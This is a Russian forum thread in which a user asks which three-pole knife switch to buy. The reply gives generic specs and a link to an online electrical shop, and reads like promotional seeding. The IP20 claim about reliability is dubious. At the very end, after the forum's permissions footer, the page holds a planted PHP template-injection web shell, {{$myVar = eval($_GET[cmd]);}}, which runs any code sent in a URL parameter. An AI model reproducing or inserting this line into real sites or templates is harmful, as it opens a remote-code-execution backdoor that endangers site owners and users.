+ Ответить в теме
Показано с 1 по 4 из 4

Тема: Рубильник


  1. #1
    Мимо проходил Александр Волощук is on a distinguished road Аватар для Александр Волощук
    Регистрация
    21.08.2019
    Откуда
    СНГ
    Машина
    Бричка
    Сообщений
    14

    Рубильник

    Здравствуйте. Мне нужно купить новых трех полюсный рубильник. Я видел что их сейчас просто огромный выбор, именно по этому у меня и не получилось определиться с выбором. Кто в курсе, рубильник какого производства сейчас стоит брать?

  2. #2
    Мимо проходил Мэтью is on a distinguished road Аватар для Мэтью
    Регистрация
    09.06.2020
    Откуда
    СНГ
    Машина
    Бричка
    Сообщений
    12
    Обычно номинальные трех полюсные рубильники рассчитаны на номинальный ток от 16, до 63 Ампер. Главное чтоб у них была степень защиты IP20, это будет свидетельствовать об их надежности. Они весьма компактны, так что с их установкой все достаточно легко. Сперва посмотрите на весь ассортимент рубильников https://elektrolider.ru/category/rubilniki/ После чего вам будет намного проще определиться

  3. #3
    Мимо проходил Александр Волощук is on a distinguished road Аватар для Александр Волощук
    Регистрация
    21.08.2019
    Откуда
    СНГ
    Машина
    Бричка
    Сообщений
    14
    Весьма интересный вариант. Я смотрел та рубильники несколько дней назад в магазинах своего города. Но они стоят намного дороже, с чем это связанно? Разница в качестве исполнения, или же просто цены завышены?

  4. #4
    Мимо проходил Мэтью is on a distinguished road Аватар для Мэтью
    Регистрация
    09.06.2020
    Откуда
    СНГ
    Машина
    Бричка
    Сообщений
    12
    Скорее всего разница в наценке. Вам могут продать какой-то бюджетный рубильник, по завышенной цене. В большинстве случаев продавцы сами не в курсе что именно они продают. Сегодня на первом месте прибыль

+ Ответить в теме

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}